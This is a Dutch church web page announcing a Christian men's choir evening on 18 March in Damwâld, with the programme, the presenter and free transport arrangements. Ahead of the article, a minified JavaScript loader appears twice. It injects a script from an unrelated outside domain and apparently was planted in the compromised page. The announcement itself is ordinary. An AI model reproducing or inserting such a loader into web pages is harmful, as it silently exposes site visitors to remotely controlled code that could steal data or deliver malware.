;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag 18 maart in Damwâld - PKN Damwâld

Zingend naar de Zondag 18 maart in Damwâld

Gepubliceerd op: zaterdag 4 maart 2023

Het 100 leden tellende Christelijk Mannenkoor ´t Harde komt op 18 maart naar de Ontmoeting, Foarwei 48 in Damwald om haar medewerking te verlenen. Het mannenkoor wil ‘Zingend Getuigen’ van het Koninkrijk dat aanstaande is, zoals te lezen is op de website van het koor. Het koor zingt o.a. Dierb´re Heiland mijn verlosser, Psalm 42, Volle verzekering en Nieuw Jeruzalem.
Onder de inspirerende leiding van dirigent Henk van der Maten en organist Johan van der Graaf komt dit “Getuigen” ongetwijfeld goed tot zijn recht! Tevens is er veel samenzang van bekende liederen, zoals Een toekomst vol van Hoop, Rijst op rijst op voor Jezus en Ik zal er zijn.
De presentatie is deze avond in de vertrouwde handen van Froukje Wesseling-Schilstra uit de Tike. Froukje is o.a. voorganger in verschillende gemeenten. Daarnaast heeft ze haar eigen steunpunt De Lethe, waar ze zich vooral richt op uitvaartbegeleiding rondom sterven en ook cursussen en workshops aanbiedt. We zien u allemaal graag weer verschijnen en hopen op een volle kerk en een gezegende avond. De aanvang is om 19.30 uur en de toegang is zoals altijd gratis. Er is een collecte ter bestrijding van de onkosten. Let op, we gebruiken geen QR code!

VERVOER Wilt u graag aanwezig zijn maar kunt u er niet komen, dan haalt de organisatie u graag op en brengt u weer thuis. U kunt hiervoor contact opnemen met Koop Schaafsma via 0613765741 of email: koopschaafsma@hotmail.nl.

Woont u in Ny Tjaerda, dan ontvangt u weer een briefje in de bus om u voor vervoer op te geven, in te leveren bij het winkeltje.

Iedereen die vervoerd wordt krijgt een gereserveerde plek vooraan in de kerk.